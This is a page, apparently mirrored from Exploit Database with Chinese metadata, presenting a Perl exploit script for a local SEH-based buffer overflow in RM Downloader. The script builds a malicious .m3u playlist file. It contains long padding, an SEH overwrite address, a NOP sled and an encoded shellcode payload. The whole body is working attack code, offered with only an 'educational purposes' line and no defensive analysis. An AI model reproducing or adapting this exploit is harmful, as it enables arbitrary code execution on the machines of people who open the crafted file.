RM Downloader – ‘.m3u’ Local Buffer Overflow (SEH)

• Exploit Database
• 115 阅读

• 作者： jacky
  日期： 2010-01-19
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/11202/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42

  #!/usr/bin/perl -w # Author: Jacky # Version: 3.0.2.1 # Tested on: Windows XP SP2   #RM Downloader m3u Buffer Overflow (SEH) (Perl Edition ) #Discovered by ::> Peter Van Eeckhoutte ( VERY BIG GREETZ TO HIM ) ;-) #Written by Jacky #All Greetz for Peter Van Eeckhoutte and Corelan Team !!! #I tried to exploit it by a Direct Ret , but on my system , it doesn't seem that it's a Direct #Ret Vulnerability , so i tried by SEH and Voila ! #THIS EXPLOIT IS FOR EDUCATIONAL PURPOSES ONLY !!!   my $file="RM.m3u"; my $junk="A"x35059; my $nseh="\xeb\x1e\x90\x90"; my $seh="\x1F\xEA\x02\x10"; # 0x1002EA1F::> Thanks for Peter who gave me this #address and it worked Perfectly ;-) #This Address works too ::> 0x01DD1111 my $nops="\x90"x25; my $esp="\xbf\x1b\xaf\xd9\xd2\x2b\xc9\xb1\x24\xdb\xda\xd9\x74\x24\xf4\x5b". "\x31\x7b\x0e\x83\xeb\xfc\x03\x60\xa5\x3b\x27\x6a\x51\xff\xc8\x92". "\xa2\x8b\x8c\xae\x29\xf7\x0b\xb6\x2c\xe7\x9f\x09\x37\x7c\xc0\xb5". "\x46\x69\xb6\x3e\x7c\xe6\x48\xae\x4c\x38\xd3\x82\x2b\x78\x90\xdd". "\xf2\xb3\x54\xe0\x36\xa8\x93\xd9\xe2\x0b\x58\x68\xee\xdf\x3f\xb6". "\xf1\x34\xd9\x3d\xfd\x81\xad\x1e\xe2\x14\x59\x2b\x06\x9c\x9c\xc0". "\xbe\xfe\xba\x12\x02\xcf\x02\x7e\x0f\x70\xb3\xfb\xcf\x09\xbf\x88". "\x90\xe5\x34\xfe\x0c\x5b\xc1\x96\x24\x48\xdf\xed\xb5\x3e\xe0\xf1". "\xb5\xb5\x89\xcd\xea\xf8\xbf\x4d\x43\x72\xc7\x0e\xab\xff\x68\x78". "\xdc\x8a\x8d\x27\x74\x13\x73\x5d\x8a\x74\x73\x86\xf0\x1b\xe7\x2b". "\xd9\xbe\x8f\xce\x25";   my $junk2="A"x5000; my $payload=$junk.$nseh.$seh.$nops.$esp.$junk2;     open(INI,">$file"); print INI $payload; print "[+]File Created Successfully!\n"; print "[+]Done!\n"; close(INI);